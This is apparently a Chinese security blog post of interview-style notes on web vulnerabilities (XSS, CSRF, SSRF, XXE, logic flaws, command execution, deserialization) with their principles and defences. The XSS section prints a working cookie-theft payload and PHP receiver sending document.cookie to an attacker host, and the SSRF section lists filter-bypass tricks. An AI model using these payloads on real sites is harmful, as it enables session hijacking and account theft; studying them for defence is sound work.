<h2 id="2-防护手段"><a href="#2-防护手段" class="headerlink" title="(2)防护手段:"></a>(2)防护手段:</h2><p>过滤危险字符，<br>输入长度限制，<br>HTML实体编码等。<br>使用黑名单<br>对于反射型和存储型，可以在数据返回客户端浏览器时，将敏感字符进行转义；<br>对于DOM型，可以使用上下文敏感数据编码。</p>
<h2 id="3-xss类型，区别？哪种类型危害最大？为什么"><a href="#3-xss类型，区别？哪种类型危害最大？为什么" class="headerlink" title="(3)xss类型，区别？哪种类型危害最大？为什么"></a>(3)xss类型，区别？哪种类型危害最大？为什么</h2><p>存储型、dom型、反射型<br>存储型危害最大</p>
<p>它是一种持久化的攻击，因为其恶意代码直接存储到了网站服务器中。</p>
<p>反射型：经过后端，不经过数据库；<br>存储型：经过后端，经过数据库；<br>DOM型：不经过后端。<br>反射型是一次性的，用户访问带xss代码的请求时，服务器接受请求并处理，之后将带有xss代码的数据返回给浏览器，浏览器解析执行；<br>存储型中提交的恶意内容会被永久存储在数据库，攻击行为伴随攻击数据一直存在；<br>DOM型的触发基于浏览器对DOM数据的解析来完成，完全是客户端的事。</p>
<h2 id="4-标签"><a href="#4-标签" class="headerlink" title="(4)标签"></a>(4)标签</h2><script>  <img>  <javascript>
## (5)利用：##
窃取管理员账号或者cookie；窃取个人信息或登录账号；发送钓鱼邮件。
## (6)如何用xss（反射型）获取用户的cookie值 ##
首先写一段js脚本，会用到document.get【cookie值】，然后把这个恶意脚本放到网站中的一些地方诱骗点击，点击后cookie值会被传送到我的电脑中来。

在自己的服务器上放入如下代码：
<?php
    $cookie = $_GET['cookie'];
    file_put_contents("cookie.txt",$cookie);
    echo '已成功获取cookie信息';
?>

payload：
<script>document.location="http://192.168.0.143/cookie.php?cookie="+document.cookie;</script>

<h1 id="csrf漏洞（跨站请求伪造）"><a href="#csrf漏洞（跨站请求伪造）" class="headerlink" title="csrf漏洞（跨站请求伪造）"></a>csrf漏洞（跨站请求伪造）</h1><h2 id="1、csrf原理？"><a href="#1、csrf原理？" class="headerlink" title="1、csrf原理？"></a>1、csrf原理？</h2><p>  原理：利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，受害人不知情的情况下会以受害者的身份向服务器发送请求，从而完成非法操作。</p>
<h2 id="2、修复："><a href="#2、修复：" class="headerlink" title="2、修复："></a>2、修复：</h2><p>  a：验证http头的referer：仅响应referer头带本域的请求。<br>  b：请求地址中添加token验证。<br>  c：使用localstorage和sessionstorage保存会话。</p>
<h2 id="3、类型"><a href="#3、类型" class="headerlink" title="3、类型"></a>3、类型</h2><p>  get请求型csrf：只需要构造url，然后诱导受害者访问；<br>  Post请求型csrf：构造自动提交的表单，诱导受害者访问或者点击。</p>
<h2 id="4、危害："><a href="#4、危害：" class="headerlink" title="4、危害："></a>4、危害：</h2><p>  利用受害者身份发送邮件、发消息、盗取受害者的账号等</p>
<h2 id="5、与xss的区别："><a href="#5、与xss的区别：" class="headerlink" title="5、与xss的区别："></a>5、与xss的区别：</h2><p>。方向不一样<br>xss 主要通过劫持用户信息，主动的去通过劫持的用户信息 去进行攻击<br>csrf 主要通过份造请求，将自己的请求伪装成正常请求，通过用户去访问正常网站<br>。对象不一样<br>xss主要攻击客户端<br>csrf主要通过伪装去访问服务端<br>。方法不一样<br>xss不需要登录 直接在页面进行语句构造进行攻击 或者脚本攻击<br>csit 需要有被伪装攻击用户的登录信息</p>
<h2 id="6、与ssrf的区别"><a href="#6、与ssrf的区别" class="headerlink" title="6、与ssrf的区别"></a>6、与ssrf的区别</h2><p>ccrf 是指攻击者盗用了你的身份，以你 的名义发送恶意请求，例如发送邮箱， 盗用账户，购买商品等。<br>ssrf 是指大型 网站 web 应用上提供了从其他服务器获取数据的功能，攻击者利用有缺陷的 web 应用作为代理远程攻击。</p>
<h1 id="ssrf漏洞（服务端请求伪造）"><a href="#ssrf漏洞（服务端请求伪造）" class="headerlink" title="ssrf漏洞（服务端请求伪造）"></a>ssrf漏洞（服务端请求伪造）</h1><h2 id="1-原理"><a href="#1-原理" class="headerlink" title="(1)原理:"></a>(1)原理:</h2><p>服务端提供了从其他服务器获取数据的功能，但是没有对目标地址进行过滤和限制。比如从指定的URL地址获取网页内容，加载指定地址的图片、数据、下载等等。<br>一般情况下，我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务，但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制，攻击者可通过篡改这个请求的目标地址来进行伪造请求。</p>
<h2 id="2-ssrf漏洞修复："><a href="#2-ssrf漏洞修复：" class="headerlink" title="(2)ssrf漏洞修复："></a>(2)ssrf漏洞修复：</h2><p> url白名单（限制不能访问内网的ip）<br>过滤返回信息<br>统一错误信息<br>限制请求端口只能为web端口，只允许访问http和https的请求；</p>
<h2 id="3-ssrf利用"><a href="#3-ssrf利用" class="headerlink" title="(3)ssrf利用"></a>(3)ssrf利用</h2><p>1、可以对服务器所在的内网、本地进行端口扫描，获取一些服务的banner信息<br>2、攻击运行在内网或本地的应用程序（比如溢出）<br>3、对内网web应用进行指纹识别，通过访问应用存在的默认文件实现；<br>4、攻击内外网的web应用，主要是使用get参数就可以实现的攻击（比如struts2漏洞利用等）<br>5、利用file协议读取本地文件<br>6、利用Redis未授权访问，HTTP CRLF注入达到getshell<br>7、DOS攻击（请求大文件，始终保持连接keep alive always）等等</p>
<h2 id="4-绕过姿势"><a href="#4-绕过姿势" class="headerlink" title="(4)绕过姿势"></a>(4)绕过姿势</h2><p>1、（绕黑名单）进制转换ip<br>2、（绕白）使用@在主机名之前的url中嵌入凭据；<br>3、302跳转；<br>4、DNS重绑定  </p>
<h1 id="xxe漏洞（外部实体注入）"><a href="#xxe漏洞（外部实体注入）" class="headerlink" title="xxe漏洞（外部实体注入）"></a>xxe漏洞（外部实体注入）</h1><h2 id="1-原理："><a href="#1-原理：" class="headerlink" title="(1)原理："></a>(1)原理：</h2><p> 一些配置不当的xml处理器会对外部实体进行引用，如果攻击者可以上传xml文档或在xml文档中添加恶意内容，通过易受攻击的代码就能攻击包含缺陷的xml处理器。</p>
<h2 id="2-利用方式："><a href="#2-利用方式：" class="headerlink" title="(2)利用方式："></a>(2)利用方式：</h2><p>任意文件读取、系统命令执行、内网端口探测、攻击内网网站、钓鱼</p>
<h2 id="3-修复防御："><a href="#3-修复防御：" class="headerlink" title="(3)修复防御："></a>(3)修复防御：</h2><p>1、使用开发语言提供的禁用外部实体的方法；<br>2、过滤提交的xml数据；（过滤SYSTEM等敏感关键字）</p>
<h1 id="逻辑漏洞"><a href="#逻辑漏洞" class="headerlink" title="逻辑漏洞"></a>逻辑漏洞</h1><h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>攻击者利用业务或功能上的设计缺陷，获取敏感信息或破坏业务完整性。</p>
<h2 id="什么是越权？分类？"><a href="#什么是越权？分类？" class="headerlink" title="什么是越权？分类？"></a>什么是越权？分类？</h2><p>   越权访问 原理：越权的本质是失效的访问控制，即未对通过身份验证的用户实施恰当的访问控制。对客户端请求的数据遗漏了权限的判定，验证一旦不充分，就容易出现越权漏洞。<br>一般分为水平越权和垂直越权<br>水平越权可以不经过验证操作其它同等权限的账号（相同权限的用户之间可以越权访问）<br>垂直越权一般是指可以不经过验证操作就可以操作权限更大的账号（低权限用户访问到了高权限用户）</p>
<h2 id="常见的逻辑漏洞有哪些？"><a href="#常见的逻辑漏洞有哪些？" class="headerlink" title="常见的逻辑漏洞有哪些？"></a>常见的逻辑漏洞有哪些？</h2><p>支付逻辑，短信逻辑，越权漏洞等<br>短信逻辑漏洞（短信轰炸漏洞）<br>顾名思义就是可以无限制地发送短信，原理由于短信业务逻辑设计缺陷，没对短信发送次数做限制，导致可以大量重复发送短信验证码。该漏洞会对其他用户造成骚扰或使厂商的运营商短信费用的增加，造成损失。</p>
<h1 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h1><h2 id="原理：-1"><a href="#原理：-1" class="headerlink" title="原理："></a>原理：</h2><p>程序应用有时需要调用一些执行系统命令的函数，如php中的system、exec、shell-exec、passthru、popen、proc_open、assert、putenv	等。</p>
<h2 id="命令执行代码执行区别"><a href="#命令执行代码执行区别" class="headerlink" title="命令执行代码执行区别"></a>命令执行代码执行区别</h2><p>命令执行漏洞是执行系统命令<br>代码执行漏洞是执行后端脚本命令(比如php的代码)</p>
<h2 id="漏洞条件"><a href="#漏洞条件" class="headerlink" title="漏洞条件"></a>漏洞条件</h2><p>用户能够控制的函数输入；存在可以执行代码或系统命令的危险函数。</p>
<h2 id="基本定义"><a href="#基本定义" class="headerlink" title="基本定义"></a>基本定义</h2><p>指攻击者可以随意执行系统命令。</p>
<h2 id="利用（危害）"><a href="#利用（危害）" class="headerlink" title="利用（危害）"></a>利用（危害）</h2><p>继承web服务程序的权限去执行系统命令（任意代码）或读写文件；反弹shell；控制整个网站甚至服务器；进一步内网渗透。</p>
<h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><p>尽量不执行外部指令；使用自定义函数或函数库来替代外部命令的功能；使用escapeshellerg函数来处理命令参数。   </p>
<h1 id="反序列化漏洞"><a href="#反序列化漏洞" class="headerlink" title="反序列化漏洞"></a>反序列化漏洞</h1><h2 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h2><p>首先了解一下序列化和反序列化的含义：<br>序列化是指Java对象转化为二进制内容，转换的原因就是为了便于网络传输和本地存储。<br>反序列化的含义是将相应的二进制转换为Java对象。</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>当输入的反序列化的数据可以被用户控制，那么攻击者就可通过构造恶意输入，让反序列产生非预期对象，同时执行构造的恶意代码</p>
<h2 id="常用函数-1"><a href="#常用函数-1" class="headerlink" title="常用函数"></a>常用函数</h2><p>（php反序列化）围绕：serialize()和unserialize()这两个函数展开</p>
<h2 id="常用的魔术函数"><a href="#常用的魔术函数" class="headerlink" title="常用的魔术函数"></a>常用的魔术函数</h2><p>1、_construct()    #当一个对象创建时被调用<br>2、_destruct()     #当一个对象被销毁时被调用<br>3、_tostring()     #输出的时候自动调用<br>4、_sleep()        #在对象在被序列化之前运行<br>5、_wakeup      #将在序列化之后立即被调用</p>

                </section>

                
                

                

            </article>

            
            <nav class="dis_flex al_post_nav">
                <a class="al_post_nav_item dis_flex_acenter" href="/">
                    
                </a>
                <a class="al_post_nav_item dis_flex_acenter" href="/2023/07/11/buuctf-3/">
                    
                        <span class="al_text_ellipsis al_post_nav_desc">buuctf-3</span>
                        <svg class="al_arrow">
                            <use xmlns="http://www.w3.org/2000/svg" xlink:href="/assets/svg_icons.svg#svg-arrow-right"></use>
                        </svg>
                    
                </a>
            </nav>
        </div>
    </div>


        <div class="al_index_footer dis_flex_center">
    <div class="al_index_footer_item al_index_footer_title">
        John Doe
    </div>

    
    

    <div class="al_index_footer_item al_index_footer_extra">
        Created By 
        <a target="_blank" rel="noopener" href="https://github.com/iGuan7u/Acetolog">AcetoLog</a>
         · Power By 
        <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>
    </div>

    <div class="al_index_footer_item al_index_footer_extra_right">
        All Right Reserved
    </div>
</div>

        <script type="text/javascript" async="async" src="/javascripts/acelog.js"></script>
        
        
        
        
        

    </body>
</html>